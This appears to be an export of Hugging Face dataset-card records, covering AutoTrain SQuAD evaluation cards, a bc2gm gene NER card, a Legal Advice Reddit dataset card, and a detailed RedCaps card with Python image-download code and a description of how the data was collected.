To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
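For reference, a minimal sketch of querying the evaluated checkpoint locally with the `transformers` question-answering pipeline (the example question and context are illustrative):

```python
from transformers import pipeline

qa = pipeline("question-answering", model="nlpconnect/roberta-base-squad2-nq")

# handle_impossible_answer=True lets the pipeline return an empty answer
# for SQuAD v2-style unanswerable questions.
result = qa(
    question="Where is the Eiffel Tower located?",
    context="The Eiffel Tower is a wrought-iron lattice tower in Paris, France.",
    handle_impossible_answer=True,
)
print(result)  # {'score': ..., 'start': ..., 'end': ..., 'answer': ...}
```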
## Contributions
Thanks to [@ankur310794](https://huggingface.co/ankur310794) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-96a02c9c-11975602 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T09:24:18+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "nlpconnect/roberta-base-squad2-nq", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-27T09:27:23+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ankur310794 for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] |
201d9a9e3d04b1bc66894808a1699731e3d45c0b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ankur310794](https://huggingface.co/ankur310794) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-ef91144d-11985603 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T09:43:16+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "nlpconnect/roberta-base-squad2-nq", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-27T09:45:45+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ankur310794 for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] |
e24270fa1657929a060d81dc258fee812b3905f6 |
# Dataset Card for bc2gm_corpus
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [Github](https://github.com/spyysalo/bc2gm-corpus/)
- **Repository:** [Github](https://github.com/spyysalo/bc2gm-corpus/)
- **Paper:** [NCBI](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2559986/)
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
[More Information Needed]
### Languages
[More Information Needed]
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
- `id`: Sentence identifier.
- `tokens`: Array of tokens composing a sentence.
- `ner_tags`: Array of tags, where `0` indicates no gene mentioned, `1` signals the first token of a gene and `2` the subsequent gene tokens.
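Since most sections of this card are unfilled, here is a minimal sketch of inspecting these fields (this assumes the dataset follows the upstream `bc2gm_corpus` schema and the conventional `O`/`B-GENE`/`I-GENE` mapping for the integer tags):

```python
from datasets import load_dataset

# Assumed to follow the upstream bc2gm_corpus loading script.
dataset = load_dataset("bc2gm_corpus", split="train")

# Conventional BIO mapping for the integer ner_tags values.
id2label = {0: "O", 1: "B-GENE", 2: "I-GENE"}

example = dataset[0]
for token, tag in zip(example["tokens"], example["ner_tags"]):
    print(f"{token}\t{id2label[tag]}")
```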
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
### Contributions
Thanks to [@mahajandiwakar](https://github.com/mahajandiwakar) for adding this dataset.
| chintagunta85/bc2gm_test | [
"task_categories:token-classification",
"task_ids:named-entity-recognition",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:10K<n<100K",
"source_datasets:original",
"language:en",
"license:unknown",
"region:us"
] | 2022-07-27T11:20:18+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["en"], "license": ["unknown"], "multilinguality": ["monolingual"], "size_categories": ["10K<n<100K"], "source_datasets": ["original"], "task_categories": ["token-classification"], "task_ids": ["named-entity-recognition"], "pretty_name": "Bc2GmCorpus"} | 2022-07-28T13:16:43+00:00 | [] | [
"en"
] | TAGS
#task_categories-token-classification #task_ids-named-entity-recognition #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-10K<n<100K #source_datasets-original #language-English #license-unknown #region-us
|
# Dataset Card for bc2gm_corpus
## Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage: Github
- Repository: Github
- Paper: NCBI
- Leaderboard:
- Point of Contact:
### Dataset Summary
### Supported Tasks and Leaderboards
### Languages
## Dataset Structure
### Data Instances
### Data Fields
- 'id': Sentence identifier.
- 'tokens': Array of tokens composing a sentence.
- 'ner_tags': Array of tags, where '0' indicates no gene mentioned, '1' signals the first token of a gene and '2' the subsequent gene tokens.
### Data Splits
## Dataset Creation
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @mahajandiwakar for adding this dataset.
| [
"# Dataset Card for bc2gm_corpus",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: Github\n- Repository: Github\n- Paper: NCBI\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'id': Sentence identifier. \n- 'tokens': Array of tokens composing a sentence. \n- 'ner_tags': Array of tags, where '0' indicates no disease mentioned, '1' signals the first token of a disease and '2' the subsequent disease tokens.",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @mahajandiwakar for adding this dataset."
] | [
"TAGS\n#task_categories-token-classification #task_ids-named-entity-recognition #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-10K<n<100K #source_datasets-original #language-English #license-unknown #region-us \n",
"# Dataset Card for bc2gm_corpus",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: Github\n- Repository: Github\n- Paper: NCBI\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'id': Sentence identifier. \n- 'tokens': Array of tokens composing a sentence. \n- 'ner_tags': Array of tags, where '0' indicates no disease mentioned, '1' signals the first token of a disease and '2' the subsequent disease tokens.",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @mahajandiwakar for adding this dataset."
] |
f105b9d763743e20d2f3b8e33f73055ad414e7c5 |
# Dataset Card for Legal Advice Reddit Dataset
## Dataset Description
- **Paper: [Parameter-Efficient Legal Domain Adaptation](https://aclanthology.org/2022.nllp-1.10/)**
- **Point of Contact: [email protected]**
### Dataset Summary
New dataset introduced in [Parameter-Efficient Legal Domain Adaptation](https://aclanthology.org/2022.nllp-1.10) (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as "/r/legaladvice"), sourcing the Reddit posts from the Pushshift
Reddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit
post's "flair" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts
must be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other
samples from the dataset.
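A minimal sketch of loading and inspecting the dataset (the `train` split name is an assumption; inspect `features` rather than assuming field or label names):

```python
from datasets import load_dataset

# Split name "train" is an assumption; adjust after inspecting the repo.
dataset = load_dataset("jonathanli/legal-advice-reddit", split="train")

# Inspect the schema instead of assuming column names.
print(dataset.features)
print(dataset[0])
```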
### Citation Information
```
@inproceedings{li-etal-2022-parameter,
title = "Parameter-Efficient Legal Domain Adaptation",
author = "Li, Jonathan and
Bhambhoria, Rohan and
Zhu, Xiaodan",
booktitle = "Proceedings of the Natural Legal Language Processing Workshop 2022",
month = dec,
year = "2022",
address = "Abu Dhabi, United Arab Emirates (Hybrid)",
publisher = "Association for Computational Linguistics",
url = "https://aclanthology.org/2022.nllp-1.10",
pages = "119--129",
}
``` | jonathanli/legal-advice-reddit | [
"language:en",
"reddit",
"law",
"region:us"
] | 2022-07-27T19:19:25+00:00 | {"language": ["en"], "pretty_name": "Legal Advice Reddit", "tags": ["reddit", "law"]} | 2023-02-23T16:39:28+00:00 | [] | [
"en"
] | TAGS
#language-English #reddit #law #region-us
|
# Dataset Card for Legal Advice Reddit Dataset
## Dataset Description
- Paper: Parameter-Efficient Legal Domain Adaptation
- Point of Contact: jxl@URL
### Dataset Summary
New dataset introduced in Parameter-Efficient Legal Domain Adaptation (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as "/r/legaladvice"), sourcing the Reddit posts from the Pushshift
Reddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit
post's "flair" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts
must be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other
samples from the dataset.
| [
"# Dataset Card for Legal Advice Reddit Dataset",
"## Dataset Description\n\n- Paper: Parameter-Efficient Legal Domain Adaptation \n- Point of Contact: jxl@URL",
"### Dataset Summary\n\nNew dataset introduced in Parameter-Efficient Legal Domain Adaptation (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as \"/r/legaldvice\"), sourcing the Reddit posts from the Pushshift\nReddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit\npost's \"flair\" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts \nmust be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other \nsamples from the dataset."
] | [
"TAGS\n#language-English #reddit #law #region-us \n",
"# Dataset Card for Legal Advice Reddit Dataset",
"## Dataset Description\n\n- Paper: Parameter-Efficient Legal Domain Adaptation \n- Point of Contact: jxl@URL",
"### Dataset Summary\n\nNew dataset introduced in Parameter-Efficient Legal Domain Adaptation (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as \"/r/legaldvice\"), sourcing the Reddit posts from the Pushshift\nReddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit\npost's \"flair\" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts \nmust be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other \nsamples from the dataset."
] |
a125fdedddadfc82908c3000165134876eb6a090 | testing an audio dataset | benfoley/test-dataset | [
"region:us"
] | 2022-07-27T22:39:14+00:00 | {} | 2022-07-27T22:41:15+00:00 | [] | [] | TAGS
#region-us
| testing an audio dataset | [] | [
"TAGS\n#region-us \n"
] |
586c8a9acf05865650594e634cb88ef3d4938136 | for training
| Slepp/train | [
"region:us"
] | 2022-07-28T05:56:58+00:00 | {} | 2022-07-28T07:18:50+00:00 | [] | [] | TAGS
#region-us
| for training
| [] | [
"TAGS\n#region-us \n"
] |
f6f04d6b8f8df133c3aa570f81b395b0c99b9fe7 | validation set | Slepp/validation | [
"region:us"
] | 2022-07-28T06:53:43+00:00 | {} | 2022-07-28T07:01:43+00:00 | [] | [] | TAGS
#region-us
| validation set | [] | [
"TAGS\n#region-us \n"
] |
09013b8be5f523de806f9c21c548d2d6e7d92a02 |
# Dataset Card for RedCaps
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Information](#dataset-information)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Information
- **Path** [/home/daniel.baek/public/common/Data](/home/daniel.baek/public/common/Data)
- **Content type** image
- **Tag** sensor, common, ai, dataset
- **Description**
- **Homepage:** [RedCaps homepage](https://redcaps.xyz/)
- **Repository:** [RedCaps repository](https://github.com/redcaps-dataset/redcaps-downloader)
- **Paper:** [RedCaps: web-curated image-text data created by the people, for the people](https://arxiv.org/abs/2111.11431)
- **Leaderboard:**
- **Point of Contact:** [Karan Desai](mailto:[email protected])
### Dataset Summary
RedCaps is a large-scale dataset of 12M image-text pairs collected from Reddit.
Images and captions from Reddit depict and describe a wide variety of objects and scenes.
The data is collected from a manually curated set of subreddits (350 total),
which give coarse image labels and allow steering of the dataset composition
without labeling individual instances. RedCaps data is created *by the people, for the people* – it contains everyday things that users like to share on social media, for example hobbies (r/crafts) and pets (r/shiba). Captions often contain specific and
fine-grained descriptions (northern cardinal, taj mahal). Subreddit names provide relevant image
labels (r/shiba) even when captions may not (mlem!), and sometimes may group many visually
unrelated images through a common semantic meaning (r/perfectfit).
### Dataset Preprocessing
This dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. To fetch the images, use the following code:
```python
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import io
import urllib
import PIL.Image
from datasets import load_dataset
from datasets.utils.file_utils import get_datasets_user_agent
USER_AGENT = get_datasets_user_agent()
def fetch_single_image(image_url, timeout=None, retries=0):
    # Try the download up to `retries + 1` times; return None if all attempts fail.
    for _ in range(retries + 1):
        try:
            request = urllib.request.Request(
                image_url,
                data=None,
                headers={"user-agent": USER_AGENT},
            )
            with urllib.request.urlopen(request, timeout=timeout) as req:
                image = PIL.Image.open(io.BytesIO(req.read()))
            break
        except Exception:
            image = None
    return image


def fetch_images(batch, num_threads, timeout=None, retries=0):
    # Download all image URLs in the batch concurrently with a thread pool.
    fetch_single_image_with_args = partial(fetch_single_image, timeout=timeout, retries=retries)
    with ThreadPoolExecutor(max_workers=num_threads) as executor:
        batch["image"] = list(executor.map(fetch_single_image_with_args, batch["image_url"]))
    return batch


num_threads = 20
dset = load_dataset("red_caps", "rabbits_2017")
dset = dset.map(fetch_images, batched=True, batch_size=100, fn_kwargs={"num_threads": num_threads})
```
Some image links point to more than one image. You can process and download those as follows:
```python
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import io
import os
import re
import urllib
import PIL.Image
import datasets
from datasets import load_dataset
from datasets.utils.file_utils import get_datasets_user_agent
USER_AGENT = get_datasets_user_agent()
def fetch_single_image(image_url, timeout=None, retries=0):
for _ in range(retries + 1):
try:
request = urllib.request.Request(
image_url,
data=None,
headers={"user-agent": USER_AGENT},
)
with urllib.request.urlopen(request, timeout=timeout) as req:
image = PIL.Image.open(io.BytesIO(req.read()))
break
except Exception:
image = None
return image
def fetch_images(batch, num_threads, timeout=None, retries=0):
fetch_single_image_with_args = partial(fetch_single_image, timeout=timeout, retries=retries)
with ThreadPoolExecutor(max_workers=num_threads) as executor:
batch["image"] = list(executor.map(lambda image_urls: [fetch_single_image_with_args(image_url) for image_url in image_urls], batch["image_url"]))
return batch
def process_image_urls(batch):
    # Split multi-image links (mostly Imgur galleries) into one URL per image.
    processed_batch_image_urls = []
    for image_url in batch["image_url"]:
        processed_example_image_urls = []
        image_url_splits = re.findall(r"http\S+", image_url)
        for image_url_split in image_url_splits:
            if "imgur" in image_url_split and "," in image_url_split:
                # Comma-separated Imgur IDs: rebuild a full URL for each ID.
                for image_url_part in image_url_split.split(","):
                    if not image_url_part:
                        continue
                    image_url_part = image_url_part.strip()
                    root, ext = os.path.splitext(image_url_part)
                    if not root.startswith("http"):
                        root = "http://i.imgur.com/" + root
                    root = root.split("#")[0]
                    if not ext:
                        ext = ".jpg"
                    # Strip query strings and size suffixes from the extension.
                    ext = re.split(r"[?%]", ext)[0]
                    image_url_part = root + ext
                    processed_example_image_urls.append(image_url_part)
            else:
                processed_example_image_urls.append(image_url_split)
        processed_batch_image_urls.append(processed_example_image_urls)
    batch["image_url"] = processed_batch_image_urls
    return batch
dset = load_dataset("red_caps", "rabbits_2017")
dset = dset.map(process_image_urls, batched=True, num_proc=4)
features = dset["train"].features.copy()
features["image"] = datasets.Sequence(datasets.Image())
num_threads = 20
dset = dset.map(fetch_images, batched=True, batch_size=100, features=features, fn_kwargs={"num_threads": num_threads})
```
Note that in the above code, we use the `datasets.Sequence` feature to represent a list of images for the multi-image links.
### Supported Tasks and Leaderboards
From the paper:
> We have used our dataset to train deep neural networks that perform image captioning, and
that learn transferable visual representations for a variety of downstream visual recognition tasks
(image classification, object detection, instance segmentation).
> We anticipate that the dataset could be used for a variety of vision-and-language (V&L) tasks,
such as image or text retrieval or text-to-image synthesis.
### Languages
All of the subreddits in RedCaps use English as their primary language.
## Dataset Structure
### Data Instances
Each instance in RedCaps represents a single Reddit image post:
```
{
  'image_id': 'bpzj7r',
  'author': 'djasz1',
  'image_url': 'https://i.redd.it/ho0wntksivy21.jpg',
  'raw_caption': 'Found on a friend’s property in the Keys FL. She is now happily living in my house.',
  'caption': "found on a friend's property in the keys fl. she is now happily living in my house.",
  'subreddit': 3,
  'score': 72,
  'created_utc': datetime.datetime(2019, 5, 18, 1, 36, 41),
  'permalink': '/r/airplants/comments/bpzj7r/found_on_a_friends_property_in_the_keys_fl_she_is/',
  'crosspost_parents': None
}
```
### Data Fields
- `image_id`: Unique alphanumeric ID of the image post (assigned by Reddit).
- `author`: Reddit username of the image post author.
- `image_url`: Static URL for downloading the image associated with the post.
- `raw_caption`: Textual description of the image, written by the post author.
- `caption`: Cleaned version of "raw_caption" by us (see Q35).
- `subreddit`: Name of subreddit where the post was submitted.
- `score`: Net upvotes (discounting downvotes) received by the image post. This field is equal to `None` if the image post is a crosspost.
- `created_utc`: Integer time epoch (in UTC) when the post was submitted to Reddit.
- `permalink`: Partial URL of the Reddit post (https://reddit.com/<permalink>).
- `crosspost_parents`: List of parent posts. This field is optional.
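As a small convenience, the full Reddit URL can be reconstructed from `permalink`; this sketch is based only on the field description above, not on code from the RedCaps release:

```python
def full_post_url(example: dict) -> str:
    # Per the field description, `permalink` is relative to reddit.com.
    return "https://reddit.com" + example["permalink"]
```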
### Data Splits
All the data is contained in the training set. The training set has nearly 12M (12,011,111) instances.
From the paper:
> We intend our dataset to be primarily used for pre-training with one or more specific downstream task(s) in mind. Hence, all instances in our dataset would be used for training while
the validation split is derived from downstream task(s). If users require a validation split, we
recommend sampling it such that it follows the same subreddit distribution as the entire dataset.
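A hedged sketch of deriving such a subreddit-stratified validation split with Hugging Face Datasets (this assumes `subreddit` is stored as a `ClassLabel`, which `stratify_by_column` requires):

```python
from datasets import load_dataset

dset = load_dataset("red_caps", "rabbits_2017")

# Hold out 5% of instances while preserving the subreddit distribution.
splits = dset["train"].train_test_split(
    test_size=0.05, stratify_by_column="subreddit", seed=0
)
train_set, val_set = splits["train"], splits["test"]
```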
## Dataset Creation
### Curation Rationale
From the paper:
> Large datasets of image-text pairs are widely used for pre-training generic representations
that transfer to a variety of downstream vision and vision-and-language tasks. Existing public
datasets of this kind were curated from search engine results (SBU Captions [1]) or HTML
alt-text from arbitrary web pages (Conceptual Captions [2, 31]). They performed complex
data filtering to deal with noisy web data. Due to aggressive filtering, their data collection is
inefficient and diversity is artificially suppressed. We argue that the quality of data depends on
its source, and the human intent behind its creation. In this work, we explore Reddit – a social
media platform, for curating high quality data. We introduce RedCaps – a large dataset of
12M image-text pairs from Reddit. While we expect the use-cases of RedCaps to be similar to
existing datasets, we discuss how Reddit as a data source leads to fast and lightweight collection,
better data quality, lets us easily steer the data distribution, and facilitates ethically responsible data curation.
### Source Data
#### Initial Data Collection and Normalization
From the paper:
> **Data Collection Pipeline**
Reddit’s uniform structure allows us to parallelize data collection as independent tasks – each task
involves collecting posts submitted to a single subreddit in one year. Our collection pipeline has three steps: (1) subreddit selection, (2) image post filtering, and (3) caption cleaning.
**Step 1**. Subreddit selection: We collect data from a manually curated set of subreddits. Subreddits
have their own rules, community norms, and moderators so curating subreddits allows us to steer the
dataset’s composition without annotating individual instances. We select subreddits with a high volume of images posts, where images tend to be photographs (rather than memes, drawings, screenshots,
etc) and post titles tend to describe image content (rather than making jokes, political commentary,
etc). We do not select any NSFW, banned, or quarantined subreddits. We want to minimize the
number of people that appear in RedCaps, so we omit subreddits whose primary purpose is to share or
comment on images of people (such as celebrity pics or user selfies). We choose subreddits focused on
general photography (r/pics, r/itookapicture), animals (r/axolotls, r/birdsofprey, r/dachshund),
plants (r/roses, r/succulents), objects (r/classiccars, r/trains, r/mechanicalkeyboards), food
(r/steak, r/macarons), scenery (r/cityporn, r/desertporn), or activities (r/carpentry, r/kayaking).
In total we collect data from 350 subreddits; the full list can be found in Appendix A.
**Step 2**. Image post filtering: We use Pushshift [41] and Reddit [42, 43] APIs to download all image
posts submitted to our selected subreddits from 2008–2020. Posts are collected at least six months
after their creation to let upvotes stabilize. We only collect posts with images hosted on three domains:
Reddit (i.redd.it), Imgur (i.imgur.com), and Flickr (staticflickr.com). Some image posts contain
multiple images (gallery posts) – in this case we only collect the first image and associate it with
the caption. We discard posts with < 2 upvotes to avoid unappealing content, and we discard posts
marked NSFW (by their authors or subreddit moderators) to avoid pornographic or disturbing content.
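A hedged sketch of the post-level filter described in Step 2 (the field names follow the public Reddit API; the thresholds are the ones stated above):

```python
ALLOWED_DOMAINS = ("i.redd.it", "i.imgur.com", "staticflickr.com")

def keep_post(post: dict) -> bool:
    # Discard low-scoring and NSFW posts, and keep only the three image hosts.
    if post.get("score", 0) < 2 or post.get("over_18", False):
        return False
    return any(domain in post.get("url", "") for domain in ALLOWED_DOMAINS)
```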
**Step 3**. Caption cleaning: We expect Reddit post titles to be less noisy than other large-scale
sources of image captions such as alt-text [2, 31], so we apply minimal text cleaning. We lowercase
captions and use ftfy [44] to remove character accents, emojis, and non-latin characters, following
[29, 35, 36]. Then we apply simple pattern matching to discard all sub-strings enclosed in brackets
((.*), [.*]). These sub-strings usually give non-semantic information: original content tags [oc],
image resolutions (800x600 px), camera specs (shot with iPhone), self-promotion [Instagram:
@user], and other references (link in comments). Finally, like [31] we replace social media
handles (words starting with ‘@’) with a [USR] token to protect user privacy and reduce redundancy.
Due to such filtering, ≈12K (0.1%) captions in our dataset are empty strings. We do not discard them,
as subreddit names alone provide meaningful supervision. Unlike CC-3M or CC-12M that discard
captions without nouns or that don’t overlap image tags, we do not discard any instances in this step.
Through this pipeline, we collect 13.4M instances from 350 subreddits. Our collection pipeline is
less resource-intensive than existing datasets – we do not require webpage crawlers, search engines,
or large databases of indexed webpages. RedCaps is easily extensible in the future by selecting more
subreddits and collecting posts from future years. Next, we perform additional filtering to mitigate
user privacy risks and harmful stereotypes in RedCaps, resulting in a final size of 12M instances.
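A rough approximation of the Step 3 caption cleaning (using `ftfy` plus simple regexes; the exact patterns used by the authors are not published in this card, so treat the details below as assumptions):

```python
import re

import ftfy

def clean_caption(raw_caption: str) -> str:
    # Normalize the text; approximate the removal of accents, emoji, and
    # non-latin characters with an ASCII round-trip.
    text = ftfy.fix_text(raw_caption).lower()
    text = text.encode("ascii", "ignore").decode("ascii")
    # Drop bracketed sub-strings such as [oc] or (shot with iPhone).
    text = re.sub(r"\([^)]*\)|\[[^\]]*\]", "", text)
    # Replace social-media handles with the [USR] privacy token.
    text = re.sub(r"@\w+", "[USR]", text)
    return " ".join(text.split())
```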
#### Who are the source language producers?
Reddit is the singular data source for RedCaps.
### Annotations
#### Annotation process
The dataset is built using fully automatic data collection pipeline which doesn't require any human annotators.
#### Who are the annotators?
The annotation process doesn't require any human annotators.
### Personal and Sensitive Information
From the paper:
> **Does the dataset relate to people?**
The dataset pertains to people in that people wrote the captions and posted images to Reddit
